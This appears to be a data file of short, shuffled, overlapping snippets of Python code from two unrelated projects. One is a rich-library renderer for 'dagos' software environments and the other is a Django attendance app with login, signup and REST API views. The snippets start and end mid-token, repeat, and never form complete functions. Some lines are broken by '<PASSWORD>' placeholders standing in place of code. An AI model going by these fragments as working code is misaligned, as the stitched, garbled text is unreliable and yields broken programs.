"= Tree(title) for package in self.package_list: tree.add(package) return tree @dataclass class Image: id:",
"common_package_table.add_column(\"\") common_package_tree = Tree(\"packages\") for packages in self.packages: common_package_tree.add(packages.__rich__()) common_package_table.add_row(common_package_tree) image_table = Table(title=f\"Targeted",
"package_tree.add(packages.__rich__()) image_table.add_row(image.id, package_tree) parent_table.add_row(common_package_table, image_table) yield parent_table @dataclass class EnvironmentVariable: name: str value:",
"return collected_components def __rich__(self) -> Panel: @group() def get_renderables(): yield Markdown(f\"{self.description}\\n\") yield self.platform",
"len(unknown_components) > 0: logger.error( \"{} of the {} requested components are unknown, specifically:",
") return collected_components def __rich__(self) -> Panel: @group() def get_renderables(): yield Markdown(f\"{self.description}\\n\") yield",
"table.add_column(\"Purpose\", ratio=1) table.add_column(\"Version\", justify=\"right\") table.add_column(\"Found?\", justify=\"center\") table.add_column(\"Valid?\", justify=\"center\") for component in self.components: table.add_row(",
"rich.tree import Tree from dagos.core.components import SoftwareComponent class SoftwareEnvironmentRegistry(type): \"\"\"A metaclass responsible for",
"components def collect_components(self) -> t.List[SoftwareComponent]: collected_components: t.List[SoftwareComponent] = [] unknown_components: t.List[str] = []",
"Tree: title = ( self.manager if self.dependency is None else f\"{self.manager} ({self.dependency})\" )",
"if component.software_component.is_valid() else \":cross_mark:\", ) yield table return Panel( Group(get_renderables()), title=f\"Environment: {self.name}\", title_align=\"left\",",
"for package in self.package_list: tree.add(package) return tree @dataclass class Image: id: str packages:",
"environment.name == name: return environment return None @dataclass class Platform: env: t.List[EnvironmentVariable] packages:",
"components: t.List[Component], ) -> None: \"\"\"\"\"\" self.path = path self.name = name self.description",
"def get_renderables(): yield Markdown(f\"{self.description}\\n\") yield self.platform table = Table( title=f\"Software Components ({len(self.components)})\", title_justify=\"left\",",
"Packages: package_list: t.List[str] manager: str = \"system\" dependency: t.Optional[str] = None def __rich__(self)",
"parent_table.add_row(common_package_table, image_table) yield parent_table @dataclass class EnvironmentVariable: name: str value: str @dataclass class",
"None: \"\"\"\"\"\" self.path = path self.name = name self.description = description self.platform =",
"= [] def __call__(cls, *args: t.Any, **kwds: t.Any) -> t.Any: \"\"\"The registry hooks",
"self.packages: common_package_tree.add(packages.__rich__()) common_package_table.add_row(common_package_tree) image_table = Table(title=f\"Targeted Container Images ({len(self.images)})\") image_table.add_column(\"ID\") image_table.add_column(\"Packages\") for image",
"= Table(box=None) parent_table.add_column() parent_table.add_column() common_package_table = Table(title=\"Common Packages\", show_header=False) common_package_table.add_column(\"\") common_package_tree = Tree(\"packages\")",
"if self.dependency is None else f\"{self.manager} ({self.dependency})\" ) tree = Tree(title) for package",
"component.version, \":white_check_mark:\" if component.software_component else \":cross_mark:\", \":white_check_mark:\" if component.software_component.is_valid() else \":cross_mark:\", ) yield",
"self.description = description self.platform = platform self.components = components def collect_components(self) -> t.List[SoftwareComponent]:",
"t.Optional[SoftwareEnvironment]: for environment in cls.environments: if environment.name == name: return environment return None",
"@dataclass class Packages: package_list: t.List[str] manager: str = \"system\" dependency: t.Optional[str] = None",
"class for software environments.\"\"\" path: Path name: str description: t.Optional[str] platform: Platform components:",
"manager: str = \"system\" dependency: t.Optional[str] = None def __rich__(self) -> Tree: title",
"def __rich_console__( self, console: Console, options: ConsoleOptions ) -> t.Generator[RenderResult]: parent_table = Table(box=None)",
"Tree(title) for package in self.package_list: tree.add(package) return tree @dataclass class Image: id: str",
"t.Optional[str] platform: Platform components: t.List[Component] def __init__( self, path: Path, name: str, description:",
"\"\"\"Base class for software environments.\"\"\" path: Path name: str description: t.Optional[str] platform: Platform",
"self.platform table = Table( title=f\"Software Components ({len(self.components)})\", title_justify=\"left\", show_lines=True, expand=True, ) table.add_column(\"Name\") table.add_column(\"Purpose\",",
"# TODO: Check if selected platform supports component? collected_components.append(component.software_component) else: unknown_components.append(component.name) if len(unknown_components)",
"= [] unknown_components: t.List[str] = [] for component in self.components: if component.software_component: logger.trace(\"Requested",
"import Tree from dagos.core.components import SoftwareComponent class SoftwareEnvironmentRegistry(type): \"\"\"A metaclass responsible for registering",
"not in cls.environments: cls.environments.append(environment) return environment @classmethod def find_environment(cls, name: str) -> t.Optional[SoftwareEnvironment]:",
"t.List[Component] def __init__( self, path: Path, name: str, description: t.Optional[str], platform: Platform, components:"
] |
[
"if request.method == 'POST': form = forms.UserCreateForm(request.POST) if form.is_valid(): form.save() username = form.cleaned_data.get('username')",
"else: form = forms.UserCreateForm() return render(request, 'Attendance/signup.html', {'form': form}) ######################### REST FRAMEWORK RELATED",
"= authenticate(username=username, password=<PASSWORD>) login(request, user) return redirect('Attendance:dash') else: form = forms.UserCreateForm() return render(request,",
"Teacher, Student, Lecture, Div, Subject from .serializers import TeacherSerializer, StudentSerializer, LectureSerializer, DivSerializer, SubjectSerializer",
"LectureListView(generics.ListCreateAPIView): queryset = Lecture.objects.all() serializer_class= LectureSerializer def perform_create(self, serializer): serializer.save(user=self.request.user) class LectureDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class=",
"generics from .models import Teacher, Student, Lecture, Div, Subject from .serializers import TeacherSerializer,",
"login_required from rest_framework import generics from .models import Teacher, Student, Lecture, Div, Subject",
"def signup(request): if request.method == 'POST': form = forms.UserCreateForm(request.POST) if form.is_valid(): form.save() username",
"return Teacher.objects.all().filter(username=self.request.user) class StudentListView(generics.ListCreateAPIView): queryset = Student.objects.all() serializer_class= StudentSerializer class StudentDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= StudentSerializer",
"serializer_class= LectureSerializer def perform_create(self, serializer): serializer.save(user=self.request.user) class LectureDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= LectureSerializer def get_queryset(self): return",
"'Attendance/login_success.html' class ThanksPage(TemplateView): template_name = 'Attendance/logout_success.html' def login_user_teacher(request): # logout(request) # username =",
"authenticate(username=username, password=password) if user is not None: if user.is_active: login(request, user) return redirect('Attendance:dash')",
"Lecture.objects.all().filter(user=self.request.user) class SubjectListView(generics.ListCreateAPIView): queryset = Subject.objects.all() serializer_class= SubjectSerializer class SubjectDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= SubjectSerializer def",
"render(request, 'Attendance/login_success.html') def signup(request): if request.method == 'POST': form = forms.UserCreateForm(request.POST) if form.is_valid():",
"DivSerializer, SubjectSerializer class HomePage(TemplateView): template_name = 'Attendance/index.html' class TestPage(TemplateView): template_name = 'Attendance/login_success.html' class",
"Subject.objects.all().filter(user=self.request.user) class DivisionListView(generics.ListCreateAPIView): queryset = Div.objects.all() serializer_class= DivSerializer class DivisionDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= DivSerializer def",
"'POST': form = forms.UserCreateForm(request.POST) if form.is_valid(): form.save() username = form.cleaned_data.get('username') raw_password = form.cleaned_data.get('<PASSWORD>')",
".models import Teacher, Student, Lecture, Div, Subject from .serializers import TeacherSerializer, StudentSerializer, LectureSerializer,",
"class StudentListView(generics.ListCreateAPIView): queryset = Student.objects.all() serializer_class= StudentSerializer class StudentDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= StudentSerializer def get_queryset(self):",
"redirect('Attendance:dash') else: form = forms.UserCreateForm() return render(request, 'Attendance/signup.html', {'form': form}) ######################### REST FRAMEWORK",
"from django.contrib.auth import logout, authenticate, login from django.contrib.auth.decorators import login_required from rest_framework import",
"'' if request.POST: username = request.POST['username'] password = request.POST['password'] user = authenticate(username=username, password=password)",
"django.views.generic import TemplateView from django.contrib.auth import logout, authenticate, login from django.contrib.auth.decorators import login_required",
"form = forms.UserCreateForm(request.POST) if form.is_valid(): form.save() username = form.cleaned_data.get('username') raw_password = form.cleaned_data.get('<PASSWORD>') user",
"= forms.UserCreateForm(request.POST) if form.is_valid(): form.save() username = form.cleaned_data.get('username') raw_password = form.cleaned_data.get('<PASSWORD>') user =",
"template_name = 'Attendance/login_success.html' class ThanksPage(TemplateView): template_name = 'Attendance/logout_success.html' def login_user_teacher(request): # logout(request) #",
"username = form.cleaned_data.get('username') raw_password = form.cleaned_data.get('<PASSWORD>') user = authenticate(username=username, password=<PASSWORD>) login(request, user) return",
"import TeacherSerializer, StudentSerializer, LectureSerializer, DivSerializer, SubjectSerializer class HomePage(TemplateView): template_name = 'Attendance/index.html' class TestPage(TemplateView):",
"user) return redirect('Attendance:dash') else: form = forms.UserCreateForm() return render(request, 'Attendance/signup.html', {'form': form}) #########################",
"TeacherSerializer, StudentSerializer, LectureSerializer, DivSerializer, SubjectSerializer class HomePage(TemplateView): template_name = 'Attendance/index.html' class TestPage(TemplateView): template_name",
"def perform_create(self, serializer): serializer.save(user=self.request.user) class LectureDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= LectureSerializer def get_queryset(self): return Lecture.objects.all().filter(user=self.request.user) class",
"from .serializers import TeacherSerializer, StudentSerializer, LectureSerializer, DivSerializer, SubjectSerializer class HomePage(TemplateView): template_name = 'Attendance/index.html'",
"request.method == 'POST': form = forms.UserCreateForm(request.POST) if form.is_valid(): form.save() username = form.cleaned_data.get('username') raw_password",
"serializer_class= SubjectSerializer def get_queryset(self): return Subject.objects.all().filter(user=self.request.user) class DivisionListView(generics.ListCreateAPIView): queryset = Div.objects.all() serializer_class= DivSerializer",
"= 'Attendance/index.html' class TestPage(TemplateView): template_name = 'Attendance/login_success.html' class ThanksPage(TemplateView): template_name = 'Attendance/logout_success.html' def",
"class LectureDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= LectureSerializer def get_queryset(self): return Lecture.objects.all().filter(user=self.request.user) class SubjectListView(generics.ListCreateAPIView): queryset = Subject.objects.all()",
"def get_queryset(self): return Subject.objects.all().filter(user=self.request.user) class DivisionListView(generics.ListCreateAPIView): queryset = Div.objects.all() serializer_class= DivSerializer class DivisionDetailView(generics.RetrieveUpdateDeleteAPIView):",
".serializers import TeacherSerializer, StudentSerializer, LectureSerializer, DivSerializer, SubjectSerializer class HomePage(TemplateView): template_name = 'Attendance/index.html' class",
"= Student.objects.all() serializer_class= StudentSerializer class StudentDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= StudentSerializer def get_queryset(self): return Student.objects.all().filter(username=self.request.user) class",
"queryset = Teacher.objects.all() serializer_class= TeacherSerializer class TeacherDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= TeacherSerializer def get_queryset(self): return Teacher.objects.all().filter(username=self.request.user)",
"forms.TeacherLoginForm()}) @login_required def dash(request): return render(request, 'Attendance/login_success.html') def signup(request): if request.method == 'POST':",
"form = forms.UserCreateForm() return render(request, 'Attendance/signup.html', {'form': form}) ######################### REST FRAMEWORK RELATED API",
"serializer_class= TeacherSerializer class TeacherDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= TeacherSerializer def get_queryset(self): return Teacher.objects.all().filter(username=self.request.user) class StudentListView(generics.ListCreateAPIView): queryset",
"import generics from .models import Teacher, Student, Lecture, Div, Subject from .serializers import",
"# logout(request) # username = password = '' if request.POST: username = request.POST['username']",
"TeacherListView(generics.ListCreateAPIView): queryset = Teacher.objects.all() serializer_class= TeacherSerializer class TeacherDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= TeacherSerializer def get_queryset(self): return",
"= forms.UserCreateForm() return render(request, 'Attendance/signup.html', {'form': form}) ######################### REST FRAMEWORK RELATED API VIEWS",
"if request.POST: username = request.POST['username'] password = request.POST['password'] user = authenticate(username=username, password=password) if",
"signup(request): if request.method == 'POST': form = forms.UserCreateForm(request.POST) if form.is_valid(): form.save() username =",
"user.is_active: login(request, user) return redirect('Attendance:dash') return render(request, 'Attendance/login.html', context={'form': forms.TeacherLoginForm()}) @login_required def dash(request):",
"return Subject.objects.all().filter(user=self.request.user) class DivisionListView(generics.ListCreateAPIView): queryset = Div.objects.all() serializer_class= DivSerializer class DivisionDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= DivSerializer",
"form.cleaned_data.get('<PASSWORD>') user = authenticate(username=username, password=<PASSWORD>) login(request, user) return redirect('Attendance:dash') else: form = forms.UserCreateForm()",
"= Subject.objects.all() serializer_class= SubjectSerializer class SubjectDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= SubjectSerializer def get_queryset(self): return Subject.objects.all().filter(user=self.request.user) class",
"login(request, user) return redirect('Attendance:dash') else: form = forms.UserCreateForm() return render(request, 'Attendance/signup.html', {'form': form})",
"import Teacher, Student, Lecture, Div, Subject from .serializers import TeacherSerializer, StudentSerializer, LectureSerializer, DivSerializer,",
"Student.objects.all() serializer_class= StudentSerializer class StudentDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= StudentSerializer def get_queryset(self): return Student.objects.all().filter(username=self.request.user) class LectureListView(generics.ListCreateAPIView):",
"class SubjectListView(generics.ListCreateAPIView): queryset = Subject.objects.all() serializer_class= SubjectSerializer class SubjectDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= SubjectSerializer def get_queryset(self):",
"= password = '' if request.POST: username = request.POST['username'] password = request.POST['password'] user",
"= 'Attendance/logout_success.html' def login_user_teacher(request): # logout(request) # username = password = '' if",
"from django.contrib.auth.decorators import login_required from rest_framework import generics from .models import Teacher, Student,",
"if user is not None: if user.is_active: login(request, user) return redirect('Attendance:dash') return render(request,",
"form.cleaned_data.get('username') raw_password = form.cleaned_data.get('<PASSWORD>') user = authenticate(username=username, password=<PASSWORD>) login(request, user) return redirect('Attendance:dash') else:",
"TeacherDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= TeacherSerializer def get_queryset(self): return Teacher.objects.all().filter(username=self.request.user) class StudentListView(generics.ListCreateAPIView): queryset = Student.objects.all() serializer_class=",
"TestPage(TemplateView): template_name = 'Attendance/login_success.html' class ThanksPage(TemplateView): template_name = 'Attendance/logout_success.html' def login_user_teacher(request): # logout(request)",
"form.is_valid(): form.save() username = form.cleaned_data.get('username') raw_password = form.cleaned_data.get('<PASSWORD>') user = authenticate(username=username, password=<PASSWORD>) login(request,",
"queryset = Student.objects.all() serializer_class= StudentSerializer class StudentDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= StudentSerializer def get_queryset(self): return Student.objects.all().filter(username=self.request.user)",
"import render, redirect from django.urls import reverse_lazy from . import forms from django.views.generic",
"TeacherSerializer class TeacherDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= TeacherSerializer def get_queryset(self): return Teacher.objects.all().filter(username=self.request.user) class StudentListView(generics.ListCreateAPIView): queryset =",
"'Attendance/signup.html', {'form': form}) ######################### REST FRAMEWORK RELATED API VIEWS ########################## class TeacherListView(generics.ListCreateAPIView): queryset",
"queryset = Subject.objects.all() serializer_class= SubjectSerializer class SubjectDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= SubjectSerializer def get_queryset(self): return Subject.objects.all().filter(user=self.request.user)",
"serializer_class= LectureSerializer def get_queryset(self): return Lecture.objects.all().filter(user=self.request.user) class SubjectListView(generics.ListCreateAPIView): queryset = Subject.objects.all() serializer_class= SubjectSerializer",
"import forms from django.views.generic import TemplateView from django.contrib.auth import logout, authenticate, login from",
"= request.POST['password'] user = authenticate(username=username, password=password) if user is not None: if user.is_active:",
"from django.views.generic import TemplateView from django.contrib.auth import logout, authenticate, login from django.contrib.auth.decorators import",
"username = request.POST['username'] password = request.POST['password'] user = authenticate(username=username, password=password) if user is",
"def get_queryset(self): return Teacher.objects.all().filter(username=self.request.user) class StudentListView(generics.ListCreateAPIView): queryset = Student.objects.all() serializer_class= StudentSerializer class StudentDetailView(generics.RetrieveUpdateDeleteAPIView):",
"def get_queryset(self): return Student.objects.all().filter(username=self.request.user) class LectureListView(generics.ListCreateAPIView): queryset = Lecture.objects.all() serializer_class= LectureSerializer def perform_create(self,",
"API VIEWS ########################## class TeacherListView(generics.ListCreateAPIView): queryset = Teacher.objects.all() serializer_class= TeacherSerializer class TeacherDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class=",
"get_queryset(self): return Student.objects.all().filter(username=self.request.user) class LectureListView(generics.ListCreateAPIView): queryset = Lecture.objects.all() serializer_class= LectureSerializer def perform_create(self, serializer):",
"Student.objects.all().filter(username=self.request.user) class LectureListView(generics.ListCreateAPIView): queryset = Lecture.objects.all() serializer_class= LectureSerializer def perform_create(self, serializer): serializer.save(user=self.request.user) class",
"from rest_framework import generics from .models import Teacher, Student, Lecture, Div, Subject from",
"return redirect('Attendance:dash') else: form = forms.UserCreateForm() return render(request, 'Attendance/signup.html', {'form': form}) ######################### REST",
"VIEWS ########################## class TeacherListView(generics.ListCreateAPIView): queryset = Teacher.objects.all() serializer_class= TeacherSerializer class TeacherDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= TeacherSerializer",
"queryset = Div.objects.all() serializer_class= DivSerializer class DivisionDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= DivSerializer def get_queryset(self): return Div.objects.all().filter(user=self.request.user)",
"logout, authenticate, login from django.contrib.auth.decorators import login_required from rest_framework import generics from .models",
"StudentSerializer, LectureSerializer, DivSerializer, SubjectSerializer class HomePage(TemplateView): template_name = 'Attendance/index.html' class TestPage(TemplateView): template_name =",
"'Attendance/index.html' class TestPage(TemplateView): template_name = 'Attendance/login_success.html' class ThanksPage(TemplateView): template_name = 'Attendance/logout_success.html' def login_user_teacher(request):",
"password=password) if user is not None: if user.is_active: login(request, user) return redirect('Attendance:dash') return",
"LectureDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= LectureSerializer def get_queryset(self): return Lecture.objects.all().filter(user=self.request.user) class SubjectListView(generics.ListCreateAPIView): queryset = Subject.objects.all() serializer_class=",
"class HomePage(TemplateView): template_name = 'Attendance/index.html' class TestPage(TemplateView): template_name = 'Attendance/login_success.html' class ThanksPage(TemplateView): template_name",
"request.POST['username'] password = request.POST['password'] user = authenticate(username=username, password=password) if user is not None:",
"@login_required def dash(request): return render(request, 'Attendance/login_success.html') def signup(request): if request.method == 'POST': form",
"import login_required from rest_framework import generics from .models import Teacher, Student, Lecture, Div,",
"def dash(request): return render(request, 'Attendance/login_success.html') def signup(request): if request.method == 'POST': form =",
"class DivisionListView(generics.ListCreateAPIView): queryset = Div.objects.all() serializer_class= DivSerializer class DivisionDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= DivSerializer def get_queryset(self):",
"StudentDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= StudentSerializer def get_queryset(self): return Student.objects.all().filter(username=self.request.user) class LectureListView(generics.ListCreateAPIView): queryset = Lecture.objects.all() serializer_class=",
"StudentSerializer def get_queryset(self): return Student.objects.all().filter(username=self.request.user) class LectureListView(generics.ListCreateAPIView): queryset = Lecture.objects.all() serializer_class= LectureSerializer def",
"rest_framework import generics from .models import Teacher, Student, Lecture, Div, Subject from .serializers",
"None: if user.is_active: login(request, user) return redirect('Attendance:dash') return render(request, 'Attendance/login.html', context={'form': forms.TeacherLoginForm()}) @login_required",
"class TeacherDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= TeacherSerializer def get_queryset(self): return Teacher.objects.all().filter(username=self.request.user) class StudentListView(generics.ListCreateAPIView): queryset = Student.objects.all()",
"def get_queryset(self): return Lecture.objects.all().filter(user=self.request.user) class SubjectListView(generics.ListCreateAPIView): queryset = Subject.objects.all() serializer_class= SubjectSerializer class SubjectDetailView(generics.RetrieveUpdateDeleteAPIView):",
"SubjectListView(generics.ListCreateAPIView): queryset = Subject.objects.all() serializer_class= SubjectSerializer class SubjectDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= SubjectSerializer def get_queryset(self): return",
"= form.cleaned_data.get('<PASSWORD>') user = authenticate(username=username, password=<PASSWORD>) login(request, user) return redirect('Attendance:dash') else: form =",
"return Student.objects.all().filter(username=self.request.user) class LectureListView(generics.ListCreateAPIView): queryset = Lecture.objects.all() serializer_class= LectureSerializer def perform_create(self, serializer): serializer.save(user=self.request.user)",
"REST FRAMEWORK RELATED API VIEWS ########################## class TeacherListView(generics.ListCreateAPIView): queryset = Teacher.objects.all() serializer_class= TeacherSerializer",
"= Teacher.objects.all() serializer_class= TeacherSerializer class TeacherDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= TeacherSerializer def get_queryset(self): return Teacher.objects.all().filter(username=self.request.user) class",
"Lecture.objects.all() serializer_class= LectureSerializer def perform_create(self, serializer): serializer.save(user=self.request.user) class LectureDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= LectureSerializer def get_queryset(self):",
"authenticate(username=username, password=<PASSWORD>) login(request, user) return redirect('Attendance:dash') else: form = forms.UserCreateForm() return render(request, 'Attendance/signup.html',",
"return render(request, 'Attendance/signup.html', {'form': form}) ######################### REST FRAMEWORK RELATED API VIEWS ########################## class",
"########################## class TeacherListView(generics.ListCreateAPIView): queryset = Teacher.objects.all() serializer_class= TeacherSerializer class TeacherDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= TeacherSerializer def",
"django.urls import reverse_lazy from . import forms from django.views.generic import TemplateView from django.contrib.auth",
". import forms from django.views.generic import TemplateView from django.contrib.auth import logout, authenticate, login",
"if user.is_active: login(request, user) return redirect('Attendance:dash') return render(request, 'Attendance/login.html', context={'form': forms.TeacherLoginForm()}) @login_required def",
"'Attendance/login_success.html') def signup(request): if request.method == 'POST': form = forms.UserCreateForm(request.POST) if form.is_valid(): form.save()",
"redirect('Attendance:dash') return render(request, 'Attendance/login.html', context={'form': forms.TeacherLoginForm()}) @login_required def dash(request): return render(request, 'Attendance/login_success.html') def",
"django.shortcuts import render, redirect from django.urls import reverse_lazy from . import forms from",
"form}) ######################### REST FRAMEWORK RELATED API VIEWS ########################## class TeacherListView(generics.ListCreateAPIView): queryset = Teacher.objects.all()",
"template_name = 'Attendance/logout_success.html' def login_user_teacher(request): # logout(request) # username = password = ''",
"= 'Attendance/login_success.html' class ThanksPage(TemplateView): template_name = 'Attendance/logout_success.html' def login_user_teacher(request): # logout(request) # username",
"import logout, authenticate, login from django.contrib.auth.decorators import login_required from rest_framework import generics from",
"<gh_stars>0 from django.shortcuts import render, redirect from django.urls import reverse_lazy from . import",
"RELATED API VIEWS ########################## class TeacherListView(generics.ListCreateAPIView): queryset = Teacher.objects.all() serializer_class= TeacherSerializer class TeacherDetailView(generics.RetrieveUpdateDeleteAPIView):",
"ThanksPage(TemplateView): template_name = 'Attendance/logout_success.html' def login_user_teacher(request): # logout(request) # username = password =",
"perform_create(self, serializer): serializer.save(user=self.request.user) class LectureDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= LectureSerializer def get_queryset(self): return Lecture.objects.all().filter(user=self.request.user) class SubjectListView(generics.ListCreateAPIView):",
"django.contrib.auth import logout, authenticate, login from django.contrib.auth.decorators import login_required from rest_framework import generics",
"is not None: if user.is_active: login(request, user) return redirect('Attendance:dash') return render(request, 'Attendance/login.html', context={'form':",
"{'form': form}) ######################### REST FRAMEWORK RELATED API VIEWS ########################## class TeacherListView(generics.ListCreateAPIView): queryset =",
"import reverse_lazy from . import forms from django.views.generic import TemplateView from django.contrib.auth import",
"user is not None: if user.is_active: login(request, user) return redirect('Attendance:dash') return render(request, 'Attendance/login.html',",
"get_queryset(self): return Subject.objects.all().filter(user=self.request.user) class DivisionListView(generics.ListCreateAPIView): queryset = Div.objects.all() serializer_class= DivSerializer class DivisionDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class=",
"SubjectDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= SubjectSerializer def get_queryset(self): return Subject.objects.all().filter(user=self.request.user) class DivisionListView(generics.ListCreateAPIView): queryset = Div.objects.all() serializer_class=",
"return render(request, 'Attendance/login_success.html') def signup(request): if request.method == 'POST': form = forms.UserCreateForm(request.POST) if",
"not None: if user.is_active: login(request, user) return redirect('Attendance:dash') return render(request, 'Attendance/login.html', context={'form': forms.TeacherLoginForm()})",
"username = password = '' if request.POST: username = request.POST['username'] password = request.POST['password']",
"class TeacherListView(generics.ListCreateAPIView): queryset = Teacher.objects.all() serializer_class= TeacherSerializer class TeacherDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= TeacherSerializer def get_queryset(self):",
"from django.urls import reverse_lazy from . import forms from django.views.generic import TemplateView from",
"class ThanksPage(TemplateView): template_name = 'Attendance/logout_success.html' def login_user_teacher(request): # logout(request) # username = password",
"reverse_lazy from . import forms from django.views.generic import TemplateView from django.contrib.auth import logout,",
"dash(request): return render(request, 'Attendance/login_success.html') def signup(request): if request.method == 'POST': form = forms.UserCreateForm(request.POST)",
"render(request, 'Attendance/signup.html', {'form': form}) ######################### REST FRAMEWORK RELATED API VIEWS ########################## class TeacherListView(generics.ListCreateAPIView):",
"LectureSerializer def perform_create(self, serializer): serializer.save(user=self.request.user) class LectureDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= LectureSerializer def get_queryset(self): return Lecture.objects.all().filter(user=self.request.user)",
"# username = password = '' if request.POST: username = request.POST['username'] password =",
"render, redirect from django.urls import reverse_lazy from . import forms from django.views.generic import",
"login from django.contrib.auth.decorators import login_required from rest_framework import generics from .models import Teacher,",
"request.POST['password'] user = authenticate(username=username, password=password) if user is not None: if user.is_active: login(request,",
"'Attendance/logout_success.html' def login_user_teacher(request): # logout(request) # username = password = '' if request.POST:",
"form.save() username = form.cleaned_data.get('username') raw_password = form.cleaned_data.get('<PASSWORD>') user = authenticate(username=username, password=<PASSWORD>) login(request, user)",
"get_queryset(self): return Lecture.objects.all().filter(user=self.request.user) class SubjectListView(generics.ListCreateAPIView): queryset = Subject.objects.all() serializer_class= SubjectSerializer class SubjectDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class=",
"TeacherSerializer def get_queryset(self): return Teacher.objects.all().filter(username=self.request.user) class StudentListView(generics.ListCreateAPIView): queryset = Student.objects.all() serializer_class= StudentSerializer class",
"password = '' if request.POST: username = request.POST['username'] password = request.POST['password'] user =",
"request.POST: username = request.POST['username'] password = request.POST['password'] user = authenticate(username=username, password=password) if user",
"TemplateView from django.contrib.auth import logout, authenticate, login from django.contrib.auth.decorators import login_required from rest_framework",
"if form.is_valid(): form.save() username = form.cleaned_data.get('username') raw_password = form.cleaned_data.get('<PASSWORD>') user = authenticate(username=username, password=<PASSWORD>)",
"from . import forms from django.views.generic import TemplateView from django.contrib.auth import logout, authenticate,",
"django.contrib.auth.decorators import login_required from rest_framework import generics from .models import Teacher, Student, Lecture,",
"HomePage(TemplateView): template_name = 'Attendance/index.html' class TestPage(TemplateView): template_name = 'Attendance/login_success.html' class ThanksPage(TemplateView): template_name =",
"StudentSerializer class StudentDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= StudentSerializer def get_queryset(self): return Student.objects.all().filter(username=self.request.user) class LectureListView(generics.ListCreateAPIView): queryset =",
"from django.shortcuts import render, redirect from django.urls import reverse_lazy from . import forms",
"= form.cleaned_data.get('username') raw_password = form.cleaned_data.get('<PASSWORD>') user = authenticate(username=username, password=<PASSWORD>) login(request, user) return redirect('Attendance:dash')",
"serializer_class= SubjectSerializer class SubjectDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= SubjectSerializer def get_queryset(self): return Subject.objects.all().filter(user=self.request.user) class DivisionListView(generics.ListCreateAPIView): queryset",
"= authenticate(username=username, password=password) if user is not None: if user.is_active: login(request, user) return",
"StudentListView(generics.ListCreateAPIView): queryset = Student.objects.all() serializer_class= StudentSerializer class StudentDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= StudentSerializer def get_queryset(self): return",
"LectureSerializer, DivSerializer, SubjectSerializer class HomePage(TemplateView): template_name = 'Attendance/index.html' class TestPage(TemplateView): template_name = 'Attendance/login_success.html'",
"authenticate, login from django.contrib.auth.decorators import login_required from rest_framework import generics from .models import",
"render(request, 'Attendance/login.html', context={'form': forms.TeacherLoginForm()}) @login_required def dash(request): return render(request, 'Attendance/login_success.html') def signup(request): if",
"login_user_teacher(request): # logout(request) # username = password = '' if request.POST: username =",
"redirect from django.urls import reverse_lazy from . import forms from django.views.generic import TemplateView",
"Div, Subject from .serializers import TeacherSerializer, StudentSerializer, LectureSerializer, DivSerializer, SubjectSerializer class HomePage(TemplateView): template_name",
"serializer): serializer.save(user=self.request.user) class LectureDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= LectureSerializer def get_queryset(self): return Lecture.objects.all().filter(user=self.request.user) class SubjectListView(generics.ListCreateAPIView): queryset",
"password = request.POST['password'] user = authenticate(username=username, password=password) if user is not None: if",
"== 'POST': form = forms.UserCreateForm(request.POST) if form.is_valid(): form.save() username = form.cleaned_data.get('username') raw_password =",
"class SubjectDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= SubjectSerializer def get_queryset(self): return Subject.objects.all().filter(user=self.request.user) class DivisionListView(generics.ListCreateAPIView): queryset = Div.objects.all()",
"forms.UserCreateForm(request.POST) if form.is_valid(): form.save() username = form.cleaned_data.get('username') raw_password = form.cleaned_data.get('<PASSWORD>') user = authenticate(username=username,",
"raw_password = form.cleaned_data.get('<PASSWORD>') user = authenticate(username=username, password=<PASSWORD>) login(request, user) return redirect('Attendance:dash') else: form",
"Teacher.objects.all() serializer_class= TeacherSerializer class TeacherDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= TeacherSerializer def get_queryset(self): return Teacher.objects.all().filter(username=self.request.user) class StudentListView(generics.ListCreateAPIView):",
"def login_user_teacher(request): # logout(request) # username = password = '' if request.POST: username",
"Subject from .serializers import TeacherSerializer, StudentSerializer, LectureSerializer, DivSerializer, SubjectSerializer class HomePage(TemplateView): template_name =",
"LectureSerializer def get_queryset(self): return Lecture.objects.all().filter(user=self.request.user) class SubjectListView(generics.ListCreateAPIView): queryset = Subject.objects.all() serializer_class= SubjectSerializer class",
